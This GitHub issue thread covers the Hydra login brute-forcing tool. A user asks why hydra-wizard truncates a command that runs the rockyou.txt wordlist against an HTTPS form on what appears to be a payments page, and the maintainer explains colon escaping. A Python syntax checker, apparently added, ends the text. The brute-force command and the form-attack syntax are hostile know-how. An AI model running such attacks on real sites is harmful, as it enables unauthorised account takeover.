Hydra-wizard not taking full command input #851

Open
Aviril7 opened this issue Jun 2, 2023 · 3 comments

@Aviril7

Aviril7 commented Jun 2, 2023

I am running Hydra v9.4 with the following command:

┌──(root㉿localhost)-[/home/kali]
└─# hydra-wizard

Welcome to the Hydra Wizard

Enter the service to attack (eg: ftp, ssh, http-post-form): https-post-form
Enter the target to attack (or filename with targets): website.com
Enter a username to test or a filename: Aviril
Enter a password to test or a filename: rockyou.txt
If you want to test for passwords (s)ame as login, (n)ull or (r)everse login, enter these letters without spaces (e.g. "sr") or leave empty otherwise:
Port number (press enter for default): 443

The following options are supported by the service module:
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-01 22:16:41

Help for module https-post-form:
============================================================================
Module http-post-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with url-encoded (resp. base64-encoded) usernames and passwords being replaced in the
 "^USER^" (resp. "^USER64^") and "^PASS^" (resp. "^PASS64^") placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter! Add the -d switch to see
the sent/received data!

The following parameters are optional:
 2=                  302 page forward return codes identify a successful attempt
 (c|C)=/page/uri     to define a different page to gather initial cookies from
 (g|G)=              skip pre-requests - only use this when no pre-cookies are required
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
                 ^USER[64]^ and ^PASS[64]^ can also be put into these headers!
                 Note: 'h' will add the user-defined header at the end
                 regardless it's already being sent by Hydra or not.
                 'H' will replace the value of that header if it exists, by the
                 one supplied by the user, or add the header at the end

Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
 All colons that are not option separators should be escaped (see the examples above and below).
 You can specify a header without escaping the colons, but that way you will not be able to put colons
 in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
 "/login.php:user=^USER^&pass=^PASS^:incorrect"
 "/login.php:user=^USER64^&pass=^PASS64^&colon=colon\:escape:S=authlog=.*success"
 "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
 "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^:H=User-Agent\: wget"
 "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"

If you want to add module options, enter them here (or leave empty): [URL-encoded option string]

The following command will be executed now:
 hydra -l Aviril -p rockyou.txt -u  -s 443 -m '[URL-encoded option string]' website.com https-post-form

Do you want to run the command now? [Y/n] y

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-01 22:17:19
[ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /efe/payments/u/0/instrument_manager_save_page?a
it=GAIA&cn=%24p_agevrz5ue03i0&eo=https%3A%2F%2Fwebsite.com&hostOrigin=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb20.&ipi=6sx4i13anpkh&mm=p&origin=https%3
A%2F%2Fwebsite.com&si=7718577566567739&style=%3Amd&cst=1685556838336&wst=1685556830408&s7e=3.1.0.0%3B3.1.0.1&rt=j&s=2

If you notice, when it says "The following command will be executed now", the command that follows isn't the complete command I passed to hydra, which makes it give the error [ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /efe/payments/u/0/instrument_manager_save_page?a it=GAIA&cn=%24p_agevrz5ue03i0&eo=https%3A%2F%2Fwebsite.com&hostOrigin=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb20.&ipi=6sx4i13anpkh&mm=p&origin=https%3 A%2F%2Fwebsite.com&si=7718577566567739&style=%3Amd&cst=1685556838336&wst=1685556830408&s7e=3.1.0.0%3B3.1.0.1&rt=j&s=2

What am I doing wrong or how can I fix this?

@vanhauser-thc
Owner

I think the line is just too long maybe.
Just execute hydra from the command line directly with the parameters? You see the order of how you have to pass the parameters.

@Aviril7
Author

Aviril7 commented Jun 3, 2023

I have tried using the command line but it still gives the same error [ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: then I created a random string same length with the request I passed to hydra just to be sure and it worked perfectly.

I am thinking it has something to do with the codes in the request body.

@vanhauser-thc
Owner

Colons that are not separators for hydra options must be escaped with a backslash, e.g.

"foo: bar" -> "foo\: bar"
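The field layout discussed in this thread can be checked before a run. The following is an added example, not part of the issue and not Hydra's own parser: it models only the rules stated in the module help quoted above (fields separated by `:`, `\:` as the escape, three required non-empty fields, optional fields starting with `2=`, `c|C=`, `g|G=` or `h|H=`). The function names and sample strings are constructed for illustration.

```python
import re

# Optional-field prefixes listed in the module help quoted in the issue.
OPTIONAL_PREFIX = re.compile(r"^(2=|[cCgGhH]=)")

def split_fields(option_string):
    """Split on ':' not preceded by a backslash, then unescape '\\:' to ':'."""
    raw = re.split(r"(?<!\\):", option_string)
    return [f.replace("\\:", ":") for f in raw]

def check_option_string(option_string):
    """Return a list of problems; an empty list means the layout looks valid."""
    fields = split_fields(option_string)
    problems = []
    names = ("url", "form parameters", "condition string")
    if len(fields) < 3:
        problems.append(f"only {len(fields)} of 3 required fields (input cut short?)")
    for name, value in zip(names, fields):
        if value == "":
            problems.append(f"{name} is empty")
    for extra in fields[3:]:
        if not OPTIONAL_PREFIX.match(extra):
            problems.append(f"unexpected field {extra!r}: unescaped ':' earlier?")
    return problems

# Constructed samples, modelled on the examples in the help text.
GOOD = r"/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:F=invalid"
UNESCAPED_HEADER = "/login.php:user=^USER^&pass=^PASS^:failed:H=Cookie: sessid=aaaa"
TRUNCATED = GOOD[:40]  # what remains if an input buffer drops the tail

if __name__ == "__main__":
    for label, s in [("good", GOOD), ("unescaped", UNESCAPED_HEADER),
                     ("truncated", TRUNCATED)]:
        print(label, split_fields(s), check_option_string(s))
```

A string that loses its tail, as the echoed command in the first post did, fails the three-field check here in the same way Hydra's "requires three arguments" error reports it.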
